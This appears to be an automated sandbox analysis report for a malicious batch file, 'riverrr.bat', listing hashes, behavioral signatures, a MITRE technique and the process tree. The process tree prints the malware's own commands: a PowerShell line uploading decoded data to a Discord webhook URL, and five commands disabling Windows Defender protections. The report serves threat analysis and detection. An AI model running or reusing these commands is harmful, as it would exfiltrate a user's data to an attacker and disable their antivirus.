93e8750b3a7c51c0f588908f39d89e1e51650c475c9376ed3f71e7c9945ed00a

Analysis

max time kernel
119s
max time network
121s
platform
windows7_x64
resource
win7-20230831-en
resource tags

arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
submitted
19/09/2023, 03:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

riverrr.bat
Size

5KB
MD5

fc498e2bdba1e606ec3a8279694de87a
SHA1

005a4e7517f8760b92bf92255224c3a51a9d5cf6
SHA256

93e8750b3a7c51c0f588908f39d89e1e51650c475c9376ed3f71e7c9945ed00a
SHA512

8b3dc61a95224129da7df6240cde12aa4dcf20fc0e37d277f1d92d152f537a751ee11eb4d8281335cb3eb728b4810d38c73914435167cd8e8f29d8e0139401be
SSDEEP

96:OyPPks5E5hngSMz6p5dvxiaXa05CACvEMRu5CECvElCw2+c:tPPQrp5dvkaXa05CACvEMI5CECvEMw4

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://discord.com/api/webhooks/1152857858543718450/qR3bD0V-wMFzOw9cnKsF3KjME7YhDRXOkZep_Oy4ztLtCIN3pK5i3wdOMzSNp6Ry3Xvv

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
3	1732	powershell.exe
4	1732	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
1732	powershell.exe
2684	powershell.exe
2804	powershell.exe
2496	powershell.exe
1060	powershell.exe
2924	powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	1732	powershell.exe
Token: SeDebugPrivilege	2684	powershell.exe
Token: SeDebugPrivilege	2804	powershell.exe
Token: SeDebugPrivilege	2496	powershell.exe
Token: SeDebugPrivilege	1060	powershell.exe
Token: SeDebugPrivilege	2924	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 1968 wrote to memory of 1732	1968	cmd.exe	29
PID 1968 wrote to memory of 1732	1968	cmd.exe	29
PID 1968 wrote to memory of 1732	1968	cmd.exe	29
PID 1968 wrote to memory of 2684	1968	cmd.exe	30
PID 1968 wrote to memory of 2684	1968	cmd.exe	30
PID 1968 wrote to memory of 2684	1968	cmd.exe	30
PID 1968 wrote to memory of 2804	1968	cmd.exe	31
PID 1968 wrote to memory of 2804	1968	cmd.exe	31
PID 1968 wrote to memory of 2804	1968	cmd.exe	31
PID 1968 wrote to memory of 2496	1968	cmd.exe	32
PID 1968 wrote to memory of 2496	1968	cmd.exe	32
PID 1968 wrote to memory of 2496	1968	cmd.exe	32
PID 1968 wrote to memory of 1060	1968	cmd.exe	33
PID 1968 wrote to memory of 1060	1968	cmd.exe	33
PID 1968 wrote to memory of 1060	1968	cmd.exe	33
PID 1968 wrote to memory of 2924	1968	cmd.exe	34
PID 1968 wrote to memory of 2924	1968	cmd.exe	34
PID 1968 wrote to memory of 2924	1968	cmd.exe	34

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\riverrr.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1968
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -nop -c "$client = New-Object System.Net.WebClient;$client.UploadString('https://discord.com/api/webhooks/1152857858543718450/qR3bD0V-wMFzOw9cnKsF3KjME7YhDRXOkZep_Oy4ztLtCIN3pK5i3wdOMzSNp6Ry3Xvv',(New-Object System.Text.ASCIIEncoding).GetString([System.Convert]::FromBase64String('JABzAD0AcwB0AGEAbgBzAC4AbgBlAHQALgBXAGUAYgBvAGQAZQBjAHQAIAB8ACAAWwBTAHQAYQBuAHMAaABWAGUAZQBtAGUAbgB0AC4ARwBlAGQAdAAuAE4AZQB0AFMAbwBmAHQAXQAuAEcAZQB0AEYAaQBsAGUAUwB0AGEAbgBzAHQAaQB0ACgAJABDAG8AbQBwAHIAZQBzAHMAKQA=')))"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1732
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -c "Set-MpPreference -DisableRealtimeMonitoring $true"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2684
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -c "Set-MpPreference -DisableIOAVProtection $true"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2804
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -c "Set-MpPreference -DisableArchiveScanning $true"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2496
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -c "Set-MpPreference -DisableBehaviorMonitoring $true"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1060
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -c "Set-MpPreference -DisableRemovableDriveScanning $true"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2924

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
d2ea139d4970410fcb9ed35f81835526

SHA1
b7a13ea30e42ea326d88ac6955ab8b0a621814f2

SHA256
36918d04a2b6f52858355532512e4d3dde85cbc0b0715faff62eba7438544fc2

SHA512
afd32ba554eaab19fc3efdada7ad77b4fb501cc5512b355a976223d741caa88914309eac96d6e308683265d6c846a6e244f6abc00fcbb3fef177f1fe44d843c5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
d2ea139d4970410fcb9ed35f81835526

SHA1
b7a13ea30e42ea326d88ac6955ab8b0a621814f2

SHA256
36918d04a2b6f52858355532512e4d3dde85cbc0b0715faff62eba7438544fc2

SHA512
afd32ba554eaab19fc3efdada7ad77b4fb501cc5512b355a976223d741caa88914309eac96d6e308683265d6c846a6e244f6abc00fcbb3fef177f1fe44d843c5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
d2ea139d4970410fcb9ed35f81835526

SHA1
b7a13ea30e42ea326d88ac6955ab8b0a621814f2

SHA256
36918d04a2b6f52858355532512e4d3dde85cbc0b0715faff62eba7438544fc2

SHA512
afd32ba554eaab19fc3efdada7ad77b4fb501cc5512b355a976223d741caa88914309eac96d6e308683265d6c846a6e244f6abc00fcbb3fef177f1fe44d843c5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
d2ea139d4970410fcb9ed35f81835526

SHA1
b7a13ea30e42ea326d88ac6955ab8b0a621814f2

SHA256
36918d04a2b6f52858355532512e4d3dde85cbc0b0715faff62eba7438544fc2

SHA512
afd32ba554eaab19fc3efdada7ad77b4fb501cc5512b355a976223d741caa88914309eac96d6e308683265d6c846a6e244f6abc00fcbb3fef177f1fe44d843c5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
d2ea139d4970410fcb9ed35f81835526

SHA1
b7a13ea30e42ea326d88ac6955ab8b0a621814f2

SHA256
36918d04a2b6f52858355532512e4d3dde85cbc0b0715faff62eba7438544fc2

SHA512
afd32ba554eaab19fc3efdada7ad77b4fb501cc5512b355a976223d741caa88914309eac96d6e308683265d6c846a6e244f6abc00fcbb3fef177f1fe44d843c5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NAAZ272V2QQ0RIN2MABS.temp

Filesize
7KB

MD5
d2ea139d4970410fcb9ed35f81835526

SHA1
b7a13ea30e42ea326d88ac6955ab8b0a621814f2

SHA256
36918d04a2b6f52858355532512e4d3dde85cbc0b0715faff62eba7438544fc2

SHA512
afd32ba554eaab19fc3efdada7ad77b4fb501cc5512b355a976223d741caa88914309eac96d6e308683265d6c846a6e244f6abc00fcbb3fef177f1fe44d843c5

Download Submit
memory/1060-57-0x0000000001FA0000-0x0000000002020000-memory.dmp

Filesize
512KB

Download
memory/1060-56-0x0000000001FA0000-0x0000000002020000-memory.dmp

Filesize
512KB

Download
memory/1060-53-0x000007FEF57F0000-0x000007FEF618D000-memory.dmp

Filesize
9.6MB

Download
memory/1060-54-0x000007FEF57F0000-0x000007FEF618D000-memory.dmp

Filesize
9.6MB

Download
memory/1060-55-0x0000000001FA0000-0x0000000002020000-memory.dmp

Filesize
512KB

Download
memory/1060-58-0x000007FEF57F0000-0x000007FEF618D000-memory.dmp

Filesize
9.6MB

Download
memory/1732-4-0x000000001B190000-0x000000001B472000-memory.dmp

Filesize
2.9MB

Download
memory/1732-11-0x000007FEF57F0000-0x000007FEF618D000-memory.dmp

Filesize
9.6MB

Download
memory/1732-5-0x000007FEF57F0000-0x000007FEF618D000-memory.dmp

Filesize
9.6MB

Download
memory/1732-8-0x0000000002A40000-0x0000000002AC0000-memory.dmp

Filesize
512KB

Download
memory/1732-7-0x0000000002420000-0x0000000002428000-memory.dmp

Filesize
32KB

Download
memory/1732-9-0x0000000002A40000-0x0000000002AC0000-memory.dmp

Filesize
512KB

Download
memory/1732-10-0x0000000002A40000-0x0000000002AC0000-memory.dmp

Filesize
512KB

Download
memory/1732-6-0x0000000002A40000-0x0000000002AC0000-memory.dmp

Filesize
512KB

Download
memory/2496-44-0x00000000028C0000-0x0000000002940000-memory.dmp

Filesize
512KB

Download
memory/2496-46-0x00000000028C0000-0x0000000002940000-memory.dmp

Filesize
512KB

Download
memory/2496-45-0x00000000028C0000-0x0000000002940000-memory.dmp

Filesize
512KB

Download
memory/2496-47-0x000007FEF4E50000-0x000007FEF57ED000-memory.dmp

Filesize
9.6MB

Download
memory/2496-41-0x000007FEF4E50000-0x000007FEF57ED000-memory.dmp

Filesize
9.6MB

Download
memory/2496-42-0x00000000028C0000-0x0000000002940000-memory.dmp

Filesize
512KB

Download
memory/2496-43-0x000007FEF4E50000-0x000007FEF57ED000-memory.dmp

Filesize
9.6MB

Download
memory/2684-18-0x000007FEF4E50000-0x000007FEF57ED000-memory.dmp

Filesize
9.6MB

Download
memory/2684-23-0x000007FEF4E50000-0x000007FEF57ED000-memory.dmp

Filesize
9.6MB

Download
memory/2684-17-0x000000001B1D0000-0x000000001B4B2000-memory.dmp

Filesize
2.9MB

Download
memory/2684-19-0x00000000023B0000-0x00000000023B8000-memory.dmp

Filesize
32KB

Download
memory/2684-20-0x0000000002870000-0x00000000028F0000-memory.dmp

Filesize
512KB

Download
memory/2684-21-0x000007FEF4E50000-0x000007FEF57ED000-memory.dmp

Filesize
9.6MB

Download
memory/2684-22-0x0000000002870000-0x00000000028F0000-memory.dmp

Filesize
512KB

Download
memory/2804-31-0x000007FEF57F0000-0x000007FEF618D000-memory.dmp

Filesize
9.6MB

Download
memory/2804-30-0x000007FEF57F0000-0x000007FEF618D000-memory.dmp

Filesize
9.6MB

Download
memory/2804-35-0x000007FEF57F0000-0x000007FEF618D000-memory.dmp

Filesize
9.6MB

Download
memory/2804-32-0x0000000002A30000-0x0000000002AB0000-memory.dmp

Filesize
512KB

Download
memory/2804-33-0x0000000002A30000-0x0000000002AB0000-memory.dmp

Filesize
512KB

Download
memory/2804-34-0x0000000002A30000-0x0000000002AB0000-memory.dmp

Filesize
512KB

Download
memory/2924-65-0x000007FEF4E50000-0x000007FEF57ED000-memory.dmp

Filesize
9.6MB

Download
memory/2924-66-0x0000000002A30000-0x0000000002AB0000-memory.dmp

Filesize
512KB

Download
memory/2924-67-0x000007FEF4E50000-0x000007FEF57ED000-memory.dmp

Filesize
9.6MB

Download
memory/2924-69-0x0000000002A30000-0x0000000002AB0000-memory.dmp

Filesize
512KB

Download
memory/2924-68-0x0000000002A3B000-0x0000000002AA2000-memory.dmp

Filesize
412KB

Download
memory/2924-70-0x000007FEF4E50000-0x000007FEF57ED000-memory.dmp

Filesize
9.6MB

Download